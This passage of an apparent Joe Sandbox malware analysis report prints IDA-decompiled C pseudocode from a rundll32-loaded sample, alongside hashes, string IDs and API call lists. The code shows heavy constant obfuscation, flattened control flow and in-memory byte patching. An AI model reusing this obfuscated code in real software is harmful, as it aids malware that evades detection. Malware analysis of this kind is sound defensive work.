                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035D3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				char _v616;
                                                                                                                      				void* _t202;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				intOrPtr _t226;
                                                                                                                      
                                                                                                                      				_v88 = _v88 & 0x00000000;
                                                                                                                      				_v96 = 0x9df3e3;
                                                                                                                      				_v92 = 0x111c87;
                                                                                                                      				_v84 = 0xa084f0;
                                                                                                                      				_v84 = _v84 | 0x40312458;
                                                                                                                      				_v84 = _v84 ^ 0x40bb7f3e;
                                                                                                                      				_v16 = 0xcefd9d;
                                                                                                                      				_v16 = _v16 + 0xcd96;
                                                                                                                      				_t210 = 0x6a;
                                                                                                                      				_v16 = _v16 * 0xf;
                                                                                                                      				_v16 = _v16 * 0x19;
                                                                                                                      				_v16 = _v16 ^ 0x30695f7a;
                                                                                                                      				_v40 = 0x424711;
                                                                                                                      				_v40 = _v40 + 0x2590;
                                                                                                                      				_v40 = _v40 ^ 0x3a2a5382;
                                                                                                                      				_v40 = _v40 | 0x2443fe5b;
                                                                                                                      				_v40 = _v40 ^ 0x3e6f608b;
                                                                                                                      				_v72 = 0x627874;
                                                                                                                      				_v72 = _v72 >> 0xf;
                                                                                                                      				_v72 = _v72 ^ 0x0000543e;
                                                                                                                      				_v32 = 0xe24590;
                                                                                                                      				_v32 = _v32 | 0xeb3a48f8;
                                                                                                                      				_v32 = _v32 << 7;
                                                                                                                      				_v32 = _v32 * 0x3c;
                                                                                                                      				_v32 = _v32 ^ 0x5522ca4e;
                                                                                                                      				_v48 = 0xd6f907;
                                                                                                                      				_v48 = _v48 << 1;
                                                                                                                      				_v48 = _v48 / _t210;
                                                                                                                      				_v48 = _v48 ^ 0x000b1c59;
                                                                                                                      				_v8 = 0xcfad9d;
                                                                                                                      				_v8 = _v8 << 0xa;
                                                                                                                      				_v8 = _v8 << 6;
                                                                                                                      				_v8 = _v8 + 0xffff7e6c;
                                                                                                                      				_v8 = _v8 ^ 0xad990d89;
                                                                                                                      				_v80 = 0x5a76f4;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 ^ 0x00be33e4;
                                                                                                                      				_v24 = 0x133aa1;
                                                                                                                      				_v24 = _v24 ^ 0xc65a4b7f;
                                                                                                                      				_v24 = _v24 * 0x1e;
                                                                                                                      				_v24 = _v24 * 0x13;
                                                                                                                      				_v24 = _v24 ^ 0x7f83be07;
                                                                                                                      				_v64 = 0x82e5fc;
                                                                                                                      				_v64 = _v64 + 0xffffc657;
                                                                                                                      				_v64 = _v64 ^ 0x008deef7;
                                                                                                                      				_v52 = 0x864f04;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xeb96;
                                                                                                                      				_v52 = _v52 ^ 0xc9ef9c56;
                                                                                                                      				_v20 = 0x197ff2;
                                                                                                                      				_v20 = _v20 + 0xffff42c2;
                                                                                                                      				_v20 = _v20 + 0x3e6b;
                                                                                                                      				_v20 = _v20 ^ 0xe022d7dd;
                                                                                                                      				_v20 = _v20 ^ 0xe031a9ca;
                                                                                                                      				_v68 = 0x51f027;
                                                                                                                      				_v68 = _v68 ^ 0xb9085631;
                                                                                                                      				_v68 = _v68 ^ 0xb9589630;
                                                                                                                      				_v56 = 0x8df2a2;
                                                                                                                      				_v56 = _v56 ^ 0x4cb2f0be;
                                                                                                                      				_v56 = _v56 ^ 0x0e08f962;
                                                                                                                      				_v56 = _v56 ^ 0x42319e50;
                                                                                                                      				_v12 = 0x46739a;
                                                                                                                      				_v12 = _v12 + 0x8337;
                                                                                                                      				_v12 = _v12 + 0xd158;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 ^ 0xf903dec7;
                                                                                                                      				_v36 = 0x3dfdbe;
                                                                                                                      				_v36 = _v36 * 0x2f;
                                                                                                                      				_t211 = 0x2a;
                                                                                                                      				_v36 = _v36 / _t211;
                                                                                                                      				_t212 = 0x45;
                                                                                                                      				_v36 = _v36 / _t212;
                                                                                                                      				_v36 = _v36 ^ 0x000da6e6;
                                                                                                                      				_v28 = 0x24761f;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 + 0xffffc268;
                                                                                                                      				_v28 = _v28 >> 8;
                                                                                                                      				_v28 = _v28 ^ 0x0040fbfa;
                                                                                                                      				_v60 = 0xc6a3a8;
                                                                                                                      				_v60 = _v60 + 0xffff6723;
                                                                                                                      				_v60 = _v60 * 0x24;
                                                                                                                      				_v60 = _v60 ^ 0x1bd7278b;
                                                                                                                      				_v44 = 0xb19a36;
                                                                                                                      				_v44 = _v44 + 0xb2d2;
                                                                                                                      				_v44 = _v44 | 0xf7fdfee7;
                                                                                                                      				_v44 = _v44 ^ 0xf7fbe5a1;
                                                                                                                      				_v76 = 0x3b8058;
                                                                                                                      				_v76 = _v76 | 0x902cc23a;
                                                                                                                      				_v76 = _v76 ^ 0x903f9f8c;
                                                                                                                      				_t226 =  *0x36520c; // 0x0
                                                                                                                      				_t202 = E00354FA8(_v84, _t226 + 0x220, _v16, _v40);
                                                                                                                      				_t234 = _a4 + 0x2c;
                                                                                                                      				_t203 = E0035FC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
                                                                                                                      				_t243 = _t203;
                                                                                                                      				if(_t203 != 0) {
                                                                                                                      					_push(_v64);
                                                                                                                      					_push(_v24);
                                                                                                                      					_push(0x3410cc);
                                                                                                                      					E0034E7CE(E0034AB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
                                                                                                                      					E0034AE03(_v36, _v28, _v60, _t206);
                                                                                                                      					E0034BAB0( &_v616, _v44, _v76);
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}


































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: 943f9ffb16b30b4896a016cd57611cf02a53bf0a7b48db1fb95d9ddd42e4c588
                                                                                                                      • Instruction ID: e69f6b6f57a00d50a0fe41828afeae783cd0e17089b987444c1e73aad9fc2f68
                                                                                                                      • Opcode Fuzzy Hash: 943f9ffb16b30b4896a016cd57611cf02a53bf0a7b48db1fb95d9ddd42e4c588
                                                                                                                      • Instruction Fuzzy Hash: 8291F0B2C00219ABCF19CFE5D98A8DEFBB1FB48304F208159E416BA260D7B55A45CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035542E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				void* _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				void* _t107;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int* _t122;
                                                                                                                      
                                                                                                                      				_t122 =  &_v40;
                                                                                                                      				_v16 = 0x36dfa5;
                                                                                                                      				_v16 = _v16 + 0x3b08;
                                                                                                                      				_t107 = __ecx;
                                                                                                                      				_t119 = 0;
                                                                                                                      				_t109 = 0x6b;
                                                                                                                      				_v16 = _v16 / _t109;
                                                                                                                      				_v16 = _v16 ^ 0x0008b2f0;
                                                                                                                      				_t120 = 0x25318c3;
                                                                                                                      				_v32 = 0xe406cb;
                                                                                                                      				_v32 = _v32 + 0xf1ff;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_t110 = 0x38;
                                                                                                                      				_v32 = _v32 / _t110;
                                                                                                                      				_v32 = _v32 ^ 0x02d3dd20;
                                                                                                                      				_v36 = 0x75fef9;
                                                                                                                      				_v36 = _v36 >> 0xe;
                                                                                                                      				_v36 = _v36 + 0x1d86;
                                                                                                                      				_v36 = _v36 | 0xca94675a;
                                                                                                                      				_v36 = _v36 ^ 0xca99002d;
                                                                                                                      				_v20 = 0xf78cd;
                                                                                                                      				_v20 = _v20 * 0x50;
                                                                                                                      				_v20 = _v20 >> 4;
                                                                                                                      				_v20 = _v20 ^ 0x004e8f0d;
                                                                                                                      				_v24 = 0x451f1c;
                                                                                                                      				_v24 = _v24 + 0xffffecca;
                                                                                                                      				_v24 = _v24 + 0xffffe02c;
                                                                                                                      				_v24 = _v24 ^ 0x0044bfd9;
                                                                                                                      				_v40 = 0xfdbfec;
                                                                                                                      				_v40 = _v40 << 8;
                                                                                                                      				_v40 = _v40 + 0x2a17;
                                                                                                                      				_v40 = _v40 ^ 0x2ee485ab;
                                                                                                                      				_v40 = _v40 ^ 0xd32b8602;
                                                                                                                      				_v28 = 0xc36f29;
                                                                                                                      				_v28 = _v28 >> 0xa;
                                                                                                                      				_v28 = _v28 + 0xffff93a5;
                                                                                                                      				_v28 = _v28 ^ 0xfffd5496;
                                                                                                                      				_v4 = 0xb22cca;
                                                                                                                      				_v4 = _v4 * 0x61;
                                                                                                                      				_v4 = _v4 ^ 0x438b1823;
                                                                                                                      				_v8 = 0x4d4bc7;
                                                                                                                      				_v8 = _v8 + 0xffff7d22;
                                                                                                                      				_v8 = _v8 ^ 0x00436970;
                                                                                                                      				_v12 = 0xfbac3c;
                                                                                                                      				_v12 = _v12 | 0x3e605f41;
                                                                                                                      				_v12 = _v12 << 4;
                                                                                                                      				_v12 = _v12 ^ 0xefb5eaa0;
                                                                                                                      				do {
                                                                                                                      					while(_t120 != 0x25318c3) {
                                                                                                                      						if(_t120 == 0x409e50d) {
                                                                                                                      							_t103 = E0035274F();
                                                                                                                      							_t122 = _t122 - 0xc + 0xc;
                                                                                                                      							_t120 = 0x7f367f8;
                                                                                                                      							_t119 = _t119 + _t103;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t120 == 0x7f367f8) {
                                                                                                                      								_t104 = E0034B782(_t107 + 0xc, _v24, _v40, _v28);
                                                                                                                      								_t122 =  &(_t122[2]);
                                                                                                                      								_t120 = 0xdeee07a;
                                                                                                                      								_t119 = _t119 + _t104;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t120 != 0xdeee07a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t119 = _t119 + E0034B782(_t107 + 4, _v4, _v8, _v12);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t119;
                                                                                                                      					}
                                                                                                                      					_t120 = 0x409e50d;
                                                                                                                      					L10:
                                                                                                                      				} while (_t120 != 0xb6d7b22);
                                                                                                                      				goto L6;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: a0796d8b05d76bde5a2a5581cf531b514ce3377ec7c864b7610b0b8e614641b1
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: FD414AB29093029FC345CF25D58940BFBE1BBD4719F419A2DF89A96220D774DA0E8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00341F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                      				char _v32;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				char* _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				intOrPtr _v80;
                                                                                                                      				char _v84;
                                                                                                                      				intOrPtr _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				intOrPtr _t419;
                                                                                                                      				void* _t424;
                                                                                                                      				void* _t432;
                                                                                                                      				signed int _t435;
                                                                                                                      				void* _t444;
                                                                                                                      				intOrPtr* _t446;
                                                                                                                      				void* _t448;
                                                                                                                      				signed char* _t458;
                                                                                                                      				signed char* _t493;
                                                                                                                      				intOrPtr* _t498;
                                                                                                                      				intOrPtr _t499;
                                                                                                                      				intOrPtr _t500;
                                                                                                                      				void* _t501;
                                                                                                                      				signed char* _t502;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				intOrPtr _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				void* _t519;
                                                                                                                      
                                                                                                                      				_t498 = _a20;
                                                                                                                      				_t446 = __edx;
                                                                                                                      				_push(_t498);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v88 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(__ecx);
                                                                                                                      				_v236 = 0xf0db43;
                                                                                                                      				_t515 = _t514 + 0x1c;
                                                                                                                      				_v236 = _v236 + 0xffff6527;
                                                                                                                      				_v236 = _v236 ^ 0x37601acd;
                                                                                                                      				_t499 = 0;
                                                                                                                      				_v236 = _v236 >> 1;
                                                                                                                      				_t448 = 0xb503f3;
                                                                                                                      				_v236 = _v236 ^ 0x1bc82d53;
                                                                                                                      				_v140 = 0x2172ad;
                                                                                                                      				_v140 = _v140 + 0x5f16;
                                                                                                                      				_v140 = _v140 ^ 0x0021d183;
                                                                                                                      				_v124 = 0x27fcb3;
                                                                                                                      				_t504 = 0x21;
                                                                                                                      				_v124 = _v124 / _t504;
                                                                                                                      				_v124 = _v124 ^ 0x00013673;
                                                                                                                      				_v108 = 0x51f448;
                                                                                                                      				_t505 = 0x49;
                                                                                                                      				_v92 = 0;
                                                                                                                      				_v108 = _v108 * 0x2f;
                                                                                                                      				_v108 = _v108 ^ 0x0f088890;
                                                                                                                      				_v212 = 0xcc9eac;
                                                                                                                      				_v212 = _v212 + 0xffffe9a6;
                                                                                                                      				_v212 = _v212 / _t505;
                                                                                                                      				_v212 = _v212 + 0xffffa822;
                                                                                                                      				_v212 = _v212 ^ 0x000711be;
                                                                                                                      				_v220 = 0xbaa1b0;
                                                                                                                      				_t506 = 0x3a;
                                                                                                                      				_v220 = _v220 * 0x1b;
                                                                                                                      				_v220 = _v220 * 0x49;
                                                                                                                      				_v220 = _v220 << 0xd;
                                                                                                                      				_v220 = _v220 ^ 0x5bc66ad4;
                                                                                                                      				_v96 = 0x96051c;
                                                                                                                      				_v96 = _v96 * 0x64;
                                                                                                                      				_v96 = _v96 ^ 0x3a9f1857;
                                                                                                                      				_v144 = 0x7390a9;
                                                                                                                      				_v144 = _v144 + 0xe6fa;
                                                                                                                      				_v144 = _v144 ^ 0x007f1cdd;
                                                                                                                      				_v196 = 0xf57225;
                                                                                                                      				_v196 = _v196 >> 0xe;
                                                                                                                      				_v196 = _v196 + 0xffff98f0;
                                                                                                                      				_v196 = _v196 ^ 0x2c45e12b;
                                                                                                                      				_v196 = _v196 ^ 0xd3b3c009;
                                                                                                                      				_v204 = 0xadefc1;
                                                                                                                      				_v204 = _v204 >> 4;
                                                                                                                      				_v204 = _v204 | 0xb7bea7b8;
                                                                                                                      				_v204 = _v204 / _t506;
                                                                                                                      				_v204 = _v204 ^ 0x03274dc6;
                                                                                                                      				_v224 = 0x9d9cb1;
                                                                                                                      				_v224 = _v224 + 0xffffa27a;
                                                                                                                      				_v224 = _v224 + 0xffffee01;
                                                                                                                      				_v224 = _v224 + 0xffff764e;
                                                                                                                      				_v224 = _v224 ^ 0x0095b081;
                                                                                                                      				_v192 = 0x5eb987;
                                                                                                                      				_v192 = _v192 + 0xffff1159;
                                                                                                                      				_t507 = 0xe;
                                                                                                                      				_v192 = _v192 * 0x23;
                                                                                                                      				_v192 = _v192 + 0xffff653a;
                                                                                                                      				_v192 = _v192 ^ 0x0cdf46f4;
                                                                                                                      				_v104 = 0x141020;
                                                                                                                      				_v104 = _v104 << 6;
                                                                                                                      				_v104 = _v104 ^ 0x0502b476;
                                                                                                                      				_v168 = 0xc57d6d;
                                                                                                                      				_v168 = _v168 / _t507;
                                                                                                                      				_v168 = _v168 | 0x88578591;
                                                                                                                      				_v168 = _v168 ^ 0x8850307a;
                                                                                                                      				_v120 = 0x64bf72;
                                                                                                                      				_v120 = _v120 << 0xf;
                                                                                                                      				_v120 = _v120 ^ 0x5fbc8f9f;
                                                                                                                      				_v128 = 0xd63e1a;
                                                                                                                      				_v128 = _v128 + 0xffff0b7c;
                                                                                                                      				_v128 = _v128 ^ 0x00df6f35;
                                                                                                                      				_v136 = 0xd9491f;
                                                                                                                      				_v136 = _v136 + 0xffff8a09;
                                                                                                                      				_v136 = _v136 ^ 0x00d088a2;
                                                                                                                      				_v112 = 0xceb298;
                                                                                                                      				_v112 = _v112 + 0x36cc;
                                                                                                                      				_v112 = _v112 ^ 0x00c43f46;
                                                                                                                      				_v132 = 0x9f966b;
                                                                                                                      				_v132 = _v132 + 0xd61c;
                                                                                                                      				_v132 = _v132 ^ 0x00a3d2ff;
                                                                                                                      				_v216 = 0x70daad;
                                                                                                                      				_v216 = _v216 ^ 0xde964b68;
                                                                                                                      				_t508 = 0x3f;
                                                                                                                      				_v216 = _v216 * 0x49;
                                                                                                                      				_v216 = _v216 | 0xd3ab0205;
                                                                                                                      				_v216 = _v216 ^ 0xdfb04ca5;
                                                                                                                      				_v200 = 0xe4f811;
                                                                                                                      				_v200 = _v200 + 0xffffdd8f;
                                                                                                                      				_v200 = _v200 | 0x8a8b7b9c;
                                                                                                                      				_v200 = _v200 + 0xb2a2;
                                                                                                                      				_v200 = _v200 ^ 0x8af46931;
                                                                                                                      				_v244 = 0x65145a;
                                                                                                                      				_v244 = _v244 >> 4;
                                                                                                                      				_v244 = _v244 + 0x823b;
                                                                                                                      				_v244 = _v244 / _t508;
                                                                                                                      				_v244 = _v244 ^ 0x000ba257;
                                                                                                                      				_v184 = 0x53b52d;
                                                                                                                      				_v184 = _v184 >> 0xd;
                                                                                                                      				_v184 = _v184 | 0x3ab2fca7;
                                                                                                                      				_v184 = _v184 >> 0xa;
                                                                                                                      				_v184 = _v184 ^ 0x00013efe;
                                                                                                                      				_v176 = 0x3e1c9c;
                                                                                                                      				_v176 = _v176 * 0x3f;
                                                                                                                      				_v176 = _v176 * 0x61;
                                                                                                                      				_v176 = _v176 ^ 0xcaa54878;
                                                                                                                      				_v172 = 0xb8475b;
                                                                                                                      				_v172 = _v172 >> 2;
                                                                                                                      				_v172 = _v172 + 0xffff45a9;
                                                                                                                      				_v172 = _v172 ^ 0x002df2ce;
                                                                                                                      				_v148 = 0x11eadc;
                                                                                                                      				_v148 = _v148 * 0x2c;
                                                                                                                      				_v148 = _v148 ^ 0x0312b4e7;
                                                                                                                      				_v228 = 0xd45ea;
                                                                                                                      				_v228 = _v228 + 0x1c9a;
                                                                                                                      				_v228 = _v228 ^ 0x843ee8f1;
                                                                                                                      				_v228 = _v228 + 0xffff47b4;
                                                                                                                      				_v228 = _v228 ^ 0x843da11a;
                                                                                                                      				_v116 = 0x7a0457;
                                                                                                                      				_t509 = 0x4d;
                                                                                                                      				_v116 = _v116 / _t509;
                                                                                                                      				_v116 = _v116 ^ 0x00002c66;
                                                                                                                      				_v232 = 0x7f0d8a;
                                                                                                                      				_v232 = _v232 + 0xa3a9;
                                                                                                                      				_v232 = _v232 + 0xf9ff;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x0040e313;
                                                                                                                      				_v208 = 0x135f21;
                                                                                                                      				_v208 = _v208 | 0x41f85818;
                                                                                                                      				_t510 = 0x60;
                                                                                                                      				_v208 = _v208 * 0x65;
                                                                                                                      				_v208 = _v208 << 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x245ebba3;
                                                                                                                      				_v240 = 0x80e1e4;
                                                                                                                      				_v240 = _v240 + 0x9e19;
                                                                                                                      				_v240 = _v240 * 0x1d;
                                                                                                                      				_v240 = _v240 + 0xa9b2;
                                                                                                                      				_v240 = _v240 ^ 0x0eacf51a;
                                                                                                                      				_v100 = 0x156d59;
                                                                                                                      				_v100 = _v100 + 0x8f40;
                                                                                                                      				_v100 = _v100 ^ 0x001bd2c0;
                                                                                                                      				_v152 = 0x95953b;
                                                                                                                      				_v152 = _v152 >> 7;
                                                                                                                      				_v152 = _v152 / _t510;
                                                                                                                      				_v152 = _v152 ^ 0x000ebfd6;
                                                                                                                      				_v180 = 0x897e25;
                                                                                                                      				_v180 = _v180 | 0x70565201;
                                                                                                                      				_t511 = 0x75;
                                                                                                                      				_v180 = _v180 / _t511;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 ^ 0xdf07d45f;
                                                                                                                      				_v160 = 0x7982fe;
                                                                                                                      				_t512 = 0x32;
                                                                                                                      				_t513 = _v88;
                                                                                                                      				_v160 = _v160 / _t512;
                                                                                                                      				_v160 = _v160 << 0xd;
                                                                                                                      				_v160 = _v160 ^ 0x4dcbb71a;
                                                                                                                      				_v188 = 0x3ea9a3;
                                                                                                                      				_v188 = _v188 >> 2;
                                                                                                                      				_v188 = _v188 * 0x4a;
                                                                                                                      				_v188 = _v188 * 0x27;
                                                                                                                      				_v188 = _v188 ^ 0xb0903fbe;
                                                                                                                      				_v164 = 0x944a5b;
                                                                                                                      				_v164 = _v164 << 9;
                                                                                                                      				_v164 = _v164 * 0x65;
                                                                                                                      				_v164 = _v164 ^ 0x02abce10;
                                                                                                                      				_v156 = 0x59a8bb;
                                                                                                                      				_v156 = _v156 >> 0xb;
                                                                                                                      				_v156 = _v156 + 0x17fc;
                                                                                                                      				_v156 = _v156 ^ 0x000023b1;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t519 = _t448 - 0x5a88f65;
                                                                                                                      						if(_t519 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t519 == 0) {
                                                                                                                      							_t500 =  *_t446;
                                                                                                                      							E0035FA99(_v112, _v132, _v216, _v200, _t500);
                                                                                                                      							_t501 = _t500 + _v124;
                                                                                                                      							E0035FD29(_v84, _v244, _t501, _v184, _v80);
                                                                                                                      							_t502 = _t501 + _v80;
                                                                                                                      							_push(_v148);
                                                                                                                      							_push(_v172);
                                                                                                                      							_push(_t513);
                                                                                                                      							E00345894(_t502, _v176);
                                                                                                                      							_t493 =  &(_t502[_t513]);
                                                                                                                      							_t515 = _t515 + 0x24;
                                                                                                                      							_t458 = _t502;
                                                                                                                      							if(_t502 >= _t493) {
                                                                                                                      								L15:
                                                                                                                      								_t432 = E0034EF71(0, 0xe);
                                                                                                                      								_t448 = 0x44ef61d;
                                                                                                                      								 *((char*)(_t432 + _t502)) = 0;
                                                                                                                      								_t499 = _v92;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							do {
                                                                                                                      								L12:
                                                                                                                      								if(( *_t458 & 0x000000ff) == _v236) {
                                                                                                                      									 *_t458 = 0xc3;
                                                                                                                      								}
                                                                                                                      								_t458 =  &(_t458[1]);
                                                                                                                      							} while (_t458 < _t493);
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0xb503f3) {
                                                                                                                      							_t448 = 0xf32de15;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x231aa40) {
